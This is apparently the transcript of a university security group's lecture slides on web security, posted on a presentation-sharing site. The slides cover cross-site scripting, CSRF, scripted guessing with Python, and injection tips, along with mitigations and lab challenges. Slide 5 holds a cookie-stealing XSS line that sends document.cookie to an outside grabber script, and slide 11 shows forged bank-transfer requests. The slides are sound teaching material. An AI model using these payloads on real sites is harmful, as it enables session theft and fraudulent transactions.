1 / 22

Web SecuritY Week 3

Web SecuritY Week 3. Computer Security Group University of Texas at Dallas. Cross Site Scripting. Overview. Exploits the trust a browser places in a site by running code (usually JS) in browser Reflected: user is tricked into running some code In URL: site.com/? msg =<script>…</script>

gordy
Download Presentation

Web SecuritY Week 3

An Image/Link below is provided (as is) to download presentation Download Policy: Content on the Website is provided to you AS IS for your information and personal use and may not be sold / licensed / shared on other websites without getting consent from its author. Content is provided to you AS IS for your information and personal use only. Download presentation by click this link. While downloading, if for some reason you are not able to download a presentation, the publisher may have deleted the file from their server. During download, if you can't get a presentation, the file might be deleted by the publisher.

E N D

Presentation Transcript

  1. Web SecuritY Week 3 Computer Security Group University of Texas at Dallas

  2. Cross Site Scripting

  3. Overview • Exploits the trust a browser places in a site by running code (usually JS) in browser • Reflected: user is tricked into running some code • In URL: site.com/?msg=<script>…</script> • Pasted into address bar • Stored: the malicious code is stored persistently on the compromised website • Unfiltered comments • SQL injections allowing user control where not intended

  4. Payloads and Goals • Steal cookies • Open a hidden IFRAME • Spam advertisements • Redirect to another page • Click jacking • Many more

  5. Example Attack • Uses jQuery • <script>$.get(‘www.mysite.com/grabber.php?c=‘ + document.cookie);</script> • A get request is made to our site, which stores the parameter c in a log file, or autopwnsthem. Whatever.

  6. Example 1 • http://10.176.169.7/web_demo/week3/main.php

  7. Mitigation • Developers • Don’t allow users to post HTML • Keep an eye out for places where attackers could modify what other peoples’ browsers render • Users • Use NoScript or similar whitelisting plugin • Don’t click or paste a link with JavaScript in it

  8. Challenge • http://10.176.169.7/web_demo/week3/challenge1/main.php

  9. Cross Server Request Forgery

  10. Overview • Similar to XSS • Exploits trust that servers place in browsers • It’s very difficult for a web server to know whether a request your computer sent it was sent with your knowledge or approval • Different than XSS, but XSS is often an attack vector for CSRF

  11. Example Attack • Images<imgsrc=“bank.com/transfer.php?to=me&amount=1000000” /> • XSS$.post(‘bank.com/transfer.php’, {to: ‘me’, amount: 1000000});

  12. Mitigation • Only trust requests from your domain • Use CSRF protection tokens – included in many web frameworks • Use the appropriate HTTP request, don’t use GET for something that modifies data • Not much to do as a user

  13. Python for Web

  14. Python Web Scripts • Python is a powerful scripting language. • Some web problems are very repetitious. • Using libraries urllib and urllib2.

  15. Example Code • import urllib • import urllib2 • url = 'http://www.someserver.com/cgi-bin/register.cgi' • values = {'name' : 'Michael Foord', • 'location' : 'Northampton', • 'language' : 'Python' } • data = urllib.urlencode(values) • req = urllib2.Request(url, data) • response = urllib2.urlopen(req) • the_page = response.read()

  16. Example 2 • http://10.176.169.7/web_demo/week3/guess.php

  17. Mitigation • Captchas • Lockouts after several attempts

  18. Challenge 2 • http://10.176.169.7/web_demo/week3/challenge2/guess.php

  19. General Tips

  20. Look at Requests! • Use TamperData, Firebug, Chrome Developer Tools, Live HTTP Headers, BurpSuite, etc. • The idea is to find things we can alter • The goal is to invalidate trust that the developer put in us

  21. Inject Everything • If your data goes into a database query, try SQL injection • If you think it’s piping your input into a program, try command injection via && and the like • If it looks like it’s rendering HTML, try some JavaScript

  22. Questions?

More Related